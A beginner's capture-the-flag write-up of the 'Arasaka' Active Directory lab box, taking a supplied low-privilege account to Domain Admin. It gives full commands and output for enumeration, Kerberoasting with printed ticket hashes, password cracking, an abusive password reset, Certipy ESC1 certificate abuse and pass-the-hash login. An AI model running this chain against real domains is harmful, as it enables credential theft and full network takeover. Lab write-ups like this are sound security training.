Arasaka | Hack Smarter
My write-up of the Arasaka Active Directory box on Hack Smarter
Foreword
I have only been learning Active Directory for a few weeks now. I was mainly focussed on web and linux stuff before this, and I wanted a bit of a change. If my technique here is dodgy, let me know at jack@dullahan.sh.
Box Description
Starting Credentials
faraday:hacksmarter123
Objective and Scope
You are a member of the Hack Smarter Red Team. This penetration test will operate under an assumed breach scenario, starting with valid credentials for a standard domain user, faraday.
The primary goal is to simulate a realistic attack, identifying and exploiting vulnerabilities to escalate privileges from a standard user to a Domain Administrator.
Enumeration
Rustscan
Since this is a one-machine AD challenge, we can assume the IP we are given is that of the domain controller. We can confirm this with rustscan and also check for any interesting ports like an IIS website.
rustscan -a 10.1.183.116 -- -sVC -Pn
I am using -sVC, a combination of -sV and -sC to enumerate the found services and run nmap’s default scripts against them, and -Pn to treat the server as online since Windows Server doesn’t typically respond to ping.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-07-09 21:34:37Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
| Issuer: commonName=hacksmarter-DC01-CA/domainComponent=hacksmarter
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
| Issuer: commonName=hacksmarter-DC01-CA/domainComponent=hacksmarter
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
3269/tcp open ssl/ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hacksmarter.local0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.hacksmarter.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.hacksmarter.local
| Issuer: commonName=hacksmarter-DC01-CA/domainComponent=hacksmarter
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKSMARTER
| NetBIOS_Domain_Name: HACKSMARTER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hacksmarter.local
| DNS_Computer_Name: DC01.hacksmarter.local
| DNS_Tree_Name: hacksmarter.local
| Product_Version: 10.0.20348
|_ System_Time: 2026-07-09T21:35:26+00:00
5985/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
57040/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
57041/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
57053/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
57067/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
57085/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
59925/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
There’s nothing particularly interesting here, just the standard Domain Controller ports. The script scanning has told us that the servers hostname is DC01.hacksmarter.local. Since there is no website, we will move on to testing the credentials we have been given.
Enumerating the Domain as Faraday
Generating Hosts File
Using netexec, we can generate our hosts file using nxc smb "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --generate-hosts-file hosts.txt.
Enumerating Shares
The first thing I like to do when I gain valid domain credentials is check what shares the user has access to using NetExec.
1
2
3
4
5
6
7
8
9
10
11
exegol-arasaka Arasaka # nxc smb "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --shares
SMB 10.1.183.116 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.183.116 445 DC01 [+] hacksmarter.local\faraday:hacksmarter123
SMB 10.1.183.116 445 DC01 [*] Enumerated shares
SMB 10.1.183.116 445 DC01 Share Permissions Remark
SMB 10.1.183.116 445 DC01 ----- ----------- ------
SMB 10.1.183.116 445 DC01 ADMIN$ Remote Admin
SMB 10.1.183.116 445 DC01 C$ Default share
SMB 10.1.183.116 445 DC01 IPC$ READ Remote IPC
SMB 10.1.183.116 445 DC01 NETLOGON READ Logon server share
SMB 10.1.183.116 445 DC01 SYSVOL READ Logon server share
Faraday can read the IPC$ directory, meaning we could perform RID brute-forcing to obtain a list of users. However, we can most likely just use --users to do so. Otherwise, there are no interesting shares present.
Enumerating Users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
exegol-arasaka Arasaka # nxc smb "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --users-export users.txt
SMB 10.1.183.116 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.183.116 445 DC01 [+] hacksmarter.local\faraday:hacksmarter123
SMB 10.1.183.116 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.1.183.116 445 DC01 Administrator 2025-09-18 22:40:20 0 Built-in account for administering the computer/domain
SMB 10.1.183.116 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.1.183.116 445 DC01 krbtgt 2025-09-21 02:51:44 0 Key Distribution Center Service Account
SMB 10.1.183.116 445 DC01 Goro 2025-09-21 15:00:31 0 Loyal to a fault
SMB 10.1.183.116 445 DC01 alt.svc 2025-09-21 15:07:42 0 Trapped for eternity
SMB 10.1.183.116 445 DC01 Yorinobu 2025-09-21 15:12:44 0
SMB 10.1.183.116 445 DC01 Hanako 2025-09-21 14:59:03 0 Waiting at embers
SMB 10.1.183.116 445 DC01 Faraday 2025-09-21 15:06:45 0
SMB 10.1.183.116 445 DC01 Smasher 2025-09-21 15:01:20 0
SMB 10.1.183.116 445 DC01 Soulkiller.svc 2025-09-21 15:30:13 0 Certificate managment for soulkiller AI
SMB 10.1.183.116 445 DC01 Hellman 2025-09-21 15:04:19 0
SMB 10.1.183.116 445 DC01 kei.svc 2025-09-21 15:05:16 0 Trapped for eternity
SMB 10.1.183.116 445 DC01 Silverhand.svc 2025-09-21 15:03:10 0 Trapped for eternity
SMB 10.1.183.116 445 DC01 Oda 2025-09-21 15:02:14 0
SMB 10.1.183.116 445 DC01 the_emperor 2025-11-06 17:19:03 0
SMB 10.1.183.116 445 DC01 [*] Enumerated 15 local users: HACKSMARTER
SMB 10.1.183.116 445 DC01 [*] Writing 15 local users to users.txt
There are a few users, including a few service accounts which might be vulnerable to Kerberoasting. I have exported them to users.txt.
Collecting Bloodhound Data
1
2
3
4
5
6
exegol-arasaka Arasaka # nxc ldap "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --bloodhound --collection All --dns-server 10.1.183.116
LDAP 10.1.183.116 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hacksmarter.local) (signing:None) (channel binding:Never)
LDAP 10.1.183.116 389 DC01 [+] hacksmarter.local\faraday:hacksmarter123
LDAP 10.1.183.116 389 DC01 Resolved collection methods: trusts, psremote, group, container, session, rdp, localadmin, acl, dcom, objectprops
LDAP 10.1.183.116 389 DC01 Done in 0M 19S
LDAP 10.1.183.116 389 DC01 Compressing output into /root/.nxc/logs/DC01_10.1.183.116_2026-07-09_225010_bloodhound.zip
Reviewing Bloodhound Data
Looking at the Bloodhound data, our user has no interesting groups or outbound object controls, so I want to move on to checking for Kerberoastable service accounts.
Kerberoasting
1
2
3
4
5
6
7
exegol-arasaka Arasaka # nxc ldap "10.1.183.116" -u 'faraday' -p 'hacksmarter123' --kerberoasting kerberoast.txt
LDAP 10.1.183.116 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hacksmarter.local) (signing:None) (channel binding:Never)
LDAP 10.1.183.116 389 DC01 [+] hacksmarter.local\faraday:hacksmarter123
LDAP 10.1.183.116 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.1.183.116 389 DC01 [*] Total of records returned 1
LDAP 10.1.183.116 389 DC01 [*] sAMAccountName: alt.svc, memberOf: [], pwdLastSet: 2025-09-21 16:07:42.894050, lastLogon: <never>
LDAP 10.1.183.116 389 DC01 $krb5tgs$23$*alt.svc$HACKSMARTER.LOCAL$hacksmarter.local\alt.svc*$dffb3a824d51c5773780390479d5d2f5$c033c03a72506dcff08556c290389fcb23e73d91f70c11c57170d884d8f555d7352b04df0441e188b5a463cfefd4f11ccb7f45d7044eaedfb952319d1ad6d0d64c30d575c19b8246131fd554ac402c45bdb2629d3cebbf2da0e44367cd75dfc7efe477800ccf7d081ce2c2a2348e99154d6599099a6c9cbc44e472feb610eb4ec8b8b84fc45a32d7c9ccd6ef7c9612ce6073a229d797b328b61b0457777e8f6115ef9d4b8e34b054227c3dabcc626df9e753b63d69136568c9d542aa2b704bd759d0bb43fe2d65c4bc35d9f9cfda33802c7d2e91ab52d759d4913e08302d519d62354365de07d1b4d5f41e005d3580c1691173626ae7b79e746f113551e3fdfc46a8f69dc9a916dfb66cdfd20a7fb31db41ddeb9a7731ff1ee5cf179a71957190cafc90904fd896b2c4541c71f0386086e44fb6220957d572c8a60417282ef3596fac6007e1ca9dd859733da54141730950c833bba468f2695a1b74c92861c5af652c0edaba22ecbd5ee1e386b503107b1607738f5a85b2c066e8b71f83c8e901d708547fcc1ed54309ff9658ca0842ef36d96ee905f2261ad00ddf8f368f0f4bbab6316e801e73110921471e3deb389bad991ce4a92ee427ce5a4651379ddd4f4446f6908649ee878149b6f327ddebc13abcae12bf5d6444840f1af1f2839c42ff8193d715bdd084934f27a7df80646df753985ed71cce34ca92b7f5d6da1250dd6ad05e9d9aa4b5bb6cc3da6bd7daea5f259865bcef666dc9e8b8f8f26225da2c1cc768e81b5cfbf2bb0e2d827d52a6ebbd0cae821fc606a90c39d008d6d71b17f4db1c6a48584f3dd0ba04fb4928fe70834f11f30f845e17e9ea2b0f488e03fdb53cdf5c8fdf6884c492dbf93044b5fff0e1d1fd276655b5e0224e0895dc7ea978c051b7801a942b77ca4f2b570477d55868e67115c9ac52b7e77675e76151ac87b69111c49248d76328d77062b5b4d30c2d28297f00f82b5b6aed2555a86dd06d339eec85a3e73df04444ed14ea53faf012ce5de65592bacfbd881478900783edf3bb82e13ead8b79e16bfae5d5dadd0f028b9dd8624fc0392034f404ab0fba257561cc46555817c819c3cc814d09bc3cd23a80fa76618cd0cb5d7a7a8ac4de7c0175fae9cda6c7e3147a8e1849bb74712d767cf971e8b11ef8097f630e8df0ef6ac9b1c7ac16c20bf203548374f41c613407795108fb598da9c6b10e107bd18607e101e3f0d65343f90aa43e7ffcbecc84d1b2b5eae5ef11e80594ed19710f60c1ba1203b083438f2c9207884b7dabb65a804674669f17bbfe05466c4bccf73450b3e89fa69560a2dfe6d2618201637357deb582a5fb60f9de3ab4eda7a143060ba0adca6fe1496476d56e5a35dde6eba7aaa6f89eea2c259cc91e1c2e70706fcd908e335424813284655497128bac6e91a9d7e564254d2e532037bb1f05a59ba53832aadf1606d9c9cebebca87c21127c3e0fb12a700446805747463c9c2fdcd810fa8670f4a74bc8b557c413a01a969b3cdca4921cc
The alt.svc user is vulnerable to kerberoasting, and we were able to capture their hash for offline cracking.
hashcat kerberoast.txt /usr/share/wordlists/rockyou.txt
Cracking the alt.svc user, we find their credetials to be alt.svc:babygirl1.
Reviewing Permissions of alt.svc
We have GenericAll over Yorinobu
Looking at Bloodhound’s outbound object control section, we have GenericAll over the Yorinobu user, meaning we can change their password with NetExec.
1
2
3
4
exegol-arasaka Arasaka # nxc smb "10.1.183.116" -u 'alt.svc' -p 'babygirl1' -M change-password -o USER=yorinobu NEWPASS=password
SMB 10.1.183.116 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hacksmarter.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.183.116 445 DC01 [+] hacksmarter.local\alt.svc:babygirl1
CHANGE-P... 10.1.183.116 445 DC01 [+] Successfully changed password for yorinobu
Reviewing Permissions of Yorinobu
Yorinobu has a very wide set of permissions. He is part of the remote management group and has GenericWrite over soulkiller.svc, allowing for either targeted kerberoasting or a shadow credentials attack.
Yorinobu has GenericWrite over soulkiller.svc
Targeted Kerberoasting
Using NetExec, we can perform targeted kerberoasting against soulkiller to obtain their blob.
1
2
3
4
5
6
exegol-arasaka Arasaka # nxc ldap "10.1.183.116" -u 'yorinobu' -p 'password' --kerberoasting targeted-kerberoast.txt --targeted-kerberoast soulkiller.svc
LDAP 10.1.183.116 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hacksmarter.local) (signing:None) (channel binding:Never)
LDAP 10.1.183.116 389 DC01 [+] hacksmarter.local\yorinobu:password
LDAP 10.1.183.116 389 DC01 [+] Found 1 enabled users without SPN.
LDAP 10.1.183.116 389 DC01 [*] sAMAccountName: Soulkiller.svc, memberOf: [], pwdLastSet: 2025-09-21 16:30:13.900225, lastLogon: <never>
LDAP 10.1.183.116 389 DC01 $krb5tgs$23$*Soulkiller.svc$HACKSMARTER.LOCAL$hacksmarter.local\Soulkiller.svc*$0543f0fdef5059859fc7d5a32dd1f1d0$5b9b211791645919f5033e36a2b1b968715446ba9e0667d4d8b61d83b62d1977ec0ef4fa34cb08e83f892c652d8bdf3c1ce641f9a5a6d99beec15c6160166f309c160a7fab43282f7138298ad168d3e8e5a1eb08cbcb6bdf4495613404b4f00d5a430455b2279c7588ce75d1b734415dfc9d0dad370c1ffdf47965cfa0d60bb2bb8daccd4b382ffd4af92e58c9e8024bef309efdfec7cf493a8ce639f8c20c232f713ea36ec082c2f4bfa05ac2fde68518f64a599fbaac4a254ff91b83aa8c6e56131f22b75c9dff4486e3217989cc971005f554ee8ce90266ae0a9b7732f5f1ee8c7f6ec49c84ac794688360ed7b0b2c2884453ea3ffad27662f8bf52fa8d1beec266697b3a7aa89a5755d320e41afebe05291aa5e3ae95583b9c17bdf106e312440f3e8d02be04dba93a7985c64466a0f49e719d6b09ffc0a4121898f131c2bf768a6391cf28347702c22fdd35b7a37e074d8c33ae22c79e8e1ee73aa38b74855a5e204cc5982cafe79336da0ebad65de3b4a7e3673a725397c07952860a4481cde2433e20c3acaeb9db29dd0c12ceecaafd430c1f93445d9f482e5bfa2317d23f5111da8fac0e4a34d0a5212f8b58294647f42cc3653544cac730ca0d0e0002053b152cefe4b3f98b12ff3054f98c0ea9093e446ccb022fff6572913b85f17032c11a9585e62bb959b153fdf10decc0d58fc9b9445887fcd5b2bbe3d844be2e337a1c7bbf49b89ac16f96c440bfd621cf663fe36e3d36830993cf01d42ad6af0da7ade97b7c4181422c025c64ff193ebf4935df245c96308e2a2c5627c8b1c59b8b93efe45c202da4c72ce44aabb88fc2493135d1ccf2b110407753ff53e82cb2bad818988ba3386ab2938245a6ecb5ca056bd04108746ff48de95814c0fc5c1cbee291a3f00603452ff85b947490848b0f199297395fc670b5f0668bed9c8060dbb512dd3b478f593b9cecd8a8728976833ef7f5f0674563b9c852130d82e7f59f32ce4a6ddceed66f0c7ca98e835d27304d4e94ef39eb542090544f7cc6c4e4b6454d400cfe9ce2cbd1f61c6dcdbc0af653999aaeb66aa27ff1d2ad2379460f9db18c11b59a53a5ef5edebbd7c5ba906068b5c4dbc72be4fb8439f3cf29cfe8a24b07a05b7039fee9249aa3602f1db50b8fee598af8404eb57b2feffbc64fad645418431e9b81c819e05aa6d71f33f5303e57714d6529039cc0c666e5b97fbd19377c96d81982da8a1a66eb1558649d0a0e33611cac6508322fd0b87ae3dc058edb2a29a0de69202daa5ca0bd87e71e5607f5de05855aaa0698dd42ad6b905d9d3c1a2ce32ba3573d11a11fe212d2416226089a2c5c96ac1764651f057084b4f75546b5a07bb592b0d2c09c96ce2a255fb02bb7048e9be8cc58486f0cf339611f13b0c79a9a092e8f0802b98ed8f18960310a2581ab423b3e6dcca382973d6252e4a64e26990df5f82d1bfa4072b32a52fd403e248ae64d86b71355ba6fe2ade0038ed7bd455db77e5b49073168f2883decfd366cd276ede4960a49d3fcefe43339e82b892ec6486bcc5edc6f5fd03b
As before we can crack with hashcat targeted-kerberoast.txt /usr/share/wordlists/rockyou.txt. We find their credentials to be soulkiller.svc:MYpassword123#.
Where to Next?
Now we have soulkiller’s account, we’ve hit a dead end on Bloodhound. As soon as bloodhound shows a dead end, I like to check for misconfigured certificates with certipy to see if we can escalate our privileges.
Checking for Vulnerable Certificates
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
exegol-arasaka Arasaka # certipy find -u "soulkiller.svc" -p 'MYpassword123#' -dc-ip "10.1.183.116" -vulnerable -text
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'hacksmarter-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'hacksmarter-DC01-CA'
[*] Checking web enrollment for CA 'hacksmarter-DC01-CA' @ 'DC01.hacksmarter.local'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260709232857_Certipy.txt'
[*] Wrote text output to '20260709232857_Certipy.txt'
Reviewing the certificates, we can see that AI_Takeover is vulnerable to ESC1. This allows us to impersonate any user, including and admin. This is game over for the Domain Controller if it can be exploited.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Certificate Templates
0
Template Name : AI_Takeover
Display Name : AI_Takeover
Certificate Authorities : hacksmarter-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-21T16:16:36+00:00
Template Last Modified : 2025-09-21T16:16:36+00:00
Permissions
Enrollment Permissions
Enrollment Rights : HACKSMARTER.LOCAL\Soulkiller.svc
HACKSMARTER.LOCAL\Domain Admins
HACKSMARTER.LOCAL\Enterprise Admins
Object Control Permissions
Owner : HACKSMARTER.LOCAL\Administrator
Full Control Principals : HACKSMARTER.LOCAL\Domain Admins
HACKSMARTER.LOCAL\Enterprise Admins
Write Owner Principals : HACKSMARTER.LOCAL\Domain Admins
HACKSMARTER.LOCAL\Enterprise Admins
Write Dacl Principals : HACKSMARTER.LOCAL\Domain Admins
HACKSMARTER.LOCAL\Enterprise Admins
Write Property Enroll : HACKSMARTER.LOCAL\Domain Admins
HACKSMARTER.LOCAL\Enterprise Admins
[+] User Enrollable Principals : HACKSMARTER.LOCAL\Soulkiller.svc
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
Exploiting ESC1
Again using certipy, we can exploit the ESC1 vulnerability to obtain the The Emperor’s certificate, and then we can pass the certificate to obtain The Emperor’s NT hash.
1
2
3
4
5
6
7
8
9
10
exegol-arasaka Arasaka # certipy req -u 'soulkiller.svc@hacksmarter.local' -p 'MYpassword123#' -dc-ip '10.1.183.116' -target 'hacksmarter.local' -ca 'hacksmarter-DC01-CA' -template 'AI_Takeover' -upn 'the_emperor@hacksmarter.local' -sid 'S-1-5-21-3154413470-3340737026-2748725799-1601'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 7
[*] Successfully requested certificate
[*] Got certificate with UPN 'the_emperor@hacksmarter.local'
[*] Certificate object SID is 'S-1-5-21-3154413470-3340737026-2748725799-1601'
[*] Saving certificate and private key to 'the_emperor.pfx'
[*] Wrote certificate and private key to 'the_emperor.pfx'
We can then authenticate to obtain the NT hash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
certipy auth -pfx the_emperor.pfx -dc-ip '10.1.183.116'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'the_emperor@hacksmarter.local'
[*] SAN URL SID: 'S-1-5-21-3154413470-3340737026-2748725799-1601'
[*] Security Extension SID: 'S-1-5-21-3154413470-3340737026-2748725799-1601'
[*] Using principal: 'the_emperor@hacksmarter.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'the_emperor.ccache'
[*] Wrote credential cache to 'the_emperor.ccache'
[*] Trying to retrieve NT hash for 'the_emperor'
[*] Got hash for 'the_emperor@hacksmarter.local': aad3b435b51404eeaad3b435b51404ee:d87640b0d83dc7f90f5f30bd6789b133
Shell as The Emperor
We now have The Emperor’s NT hash, meaning we can use EvilWinRM to authenticate to the Domain Controller and obtain the root flag.
1
2
3
4
5
6
7
8
9
10
exegol-arasaka Arasaka # evil-winrm-py --ip "10.1.183.116" --user "the_emperor" --hash "d87640b0d83dc7f90f5f30bd6789b133"
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to '10.1.183.116:5985' as 'the_emperor'
evil-winrm-py PS C:\Users\the_emperor\Documents> type C:\Users\Administrator\Desktop\root.txt
fcf1dd0f08d1068a2f151fd2ec5ecf05
Final Notes
This is my first proper write-up, and one of the first Active Directory machines I completed myself. I hope to write more in the future. Thanks for reading.

